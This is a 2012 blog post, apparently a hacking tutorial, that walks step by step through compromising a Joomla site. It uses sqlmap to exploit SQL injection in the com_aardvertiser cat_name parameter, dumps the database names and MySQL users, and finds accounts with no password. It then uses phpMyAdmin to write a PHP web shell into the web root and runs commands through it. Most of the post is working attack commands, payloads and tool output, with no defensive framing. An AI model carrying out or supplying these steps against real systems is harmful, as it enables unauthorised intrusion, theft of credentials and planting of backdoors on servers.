Imagine that our site is vulnerable to SQL Injection in the following link:
Initially we will try to inject it by using sqlmap:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs [03:18:19] [WARNING] POST parameter ‘cat_name’ is not injectable [03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase –level/–risk values to perform more tests. Rerun by providing either a valid –string or a valid –regexp, refer to the user’s manual for details [*] shutting down at: 03:18:19
All parameters appear to be not injectable, so we will set the appropriate values in level and risk arguments:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs –level=5 –risk=3 [03:21:02] [INFO] checking if the injection point on POST parameter ‘cat_name’ is a false positive POST parameter ‘cat_name’ is vulnerable. Do you want to keep testing the others? [y/N] y sqlmap identified the following injection points with a total of 537 HTTP(s) requests: — Place: POST Parameter: cat_name Type: boolean-based blind Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment) Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view — [03:21:22] [INFO] manual usage of POST payloads requires url encoding [03:21:22] [INFO] testing MySQL [03:21:22] [INFO] confirming MySQL [03:21:23] [INFO] the back-end DBMS is MySQL - web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL >= 5.0.0 [03:21:23] [INFO] fetching database names [03:21:23] [INFO] fetching number of databases [03:21:23] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads [03:21:23] [INFO] retrieved: 6 [03:21:24] [INFO] retrieved: information_schema [03:21:54] [INFO] retrieved: cdcol [03:22:03] [INFO] retrieved: joomla [03:22:14] [INFO] retrieved: mysql [03:22:23] [INFO] retrieved: phpmyadmin [03:22:40] [INFO] retrieved: test available databases [6]: [*] cdcol [*] information_schema [*] joomla [*] mysql [*] phpmyadmin [*] test [03:22:48] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′ [*] shutting down at: 03:22:48
It’s time to search for mysql users and dump their hashes:
Select AllCode:
root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –level=5 –risk=3 –users –password [03:23:37] [WARNING] the testable parameter ‘cat_name’ you provided is not inside the Cookie sqlmap identified the following injection points with a total of 0 HTTP(s) requests: — Place: POST Parameter: cat_name Type: boolean-based blind Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment) Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view — [03:23:37] [INFO] manual usage of POST payloads requires url encoding [03:23:37] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5 [03:23:37] [INFO] fetching database users [03:23:37] [INFO] fetching number of database users [03:23:37] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads [03:23:37] [INFO] retrieved: 5 [03:23:38] [INFO] retrieved: ‘root’@'localhost’ [03:24:06] [INFO] retrieved: ‘root’@'linux’ [03:24:28] [INFO] retrieved: ‘pma’@'localhost’ [03:24:54] [INFO] retrieved: ”@’localhost’ [03:25:16] [INFO] retrieved: ”@’linux’ database management system users [5]: [*] ”@’linux’ [*] ”@’localhost’ [*] ‘pma’@'localhost’ [*] ‘root’@'linux’ [*] ‘root’@'localhost’ [03:25:33] [INFO] fetching database users password hashes [03:25:33] [INFO] fetching database users [03:25:33] [INFO] fetching number of password hashes for user ‘root’ [03:25:33] [INFO] retrieved: 1 [03:25:34] [INFO] fetching password hashes for user ‘root’ [03:25:34] [INFO] retrieved: [03:25:35] [INFO] fetching number of password hashes for user ‘pma’ [03:25:35] [INFO] retrieved: 1 [03:25:37] [INFO] fetching password hashes for user ‘pma’ [03:25:37] [INFO] retrieved: [03:25:38] [INFO] fetching number of password hashes for user ” [03:25:38] [INFO] retrieved: [03:25:39] [WARNING] unable to retrieve the number of password hashes for user ” [03:25:39] [INFO] fetching number of password hashes for user ” [03:25:39] [INFO] retrieved: [03:25:39] [WARNING] unable to retrieve the number of password hashes for user ” do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y [03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net. [03:25:47] [WARNING] no clear password(s) found database management system users password hashes: [*] pma [1]: password hash: NULL [*] root [1]: password hash: NULL [03:25:47] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′ [*] shutting down at: 03:25:47
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:
As we can see, the system uses xampp, and by default on xampp the web server’s directory is:
After gathering all the appropriate information we are ready to create our php backdoor by using the following sql query:
Select AllCode:
select “<?php system($_REQUEST['cmd']); ?>” into dumpfile ‘/opt/lampp/htdocs/cmd.php’ –;
Let’s test our backdoor:
Select AllCode:
http://www.foo.org/cmd.php?cmd=id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Voila!
©2012, copyright BLACK BURN
0 comments:
Post a Comment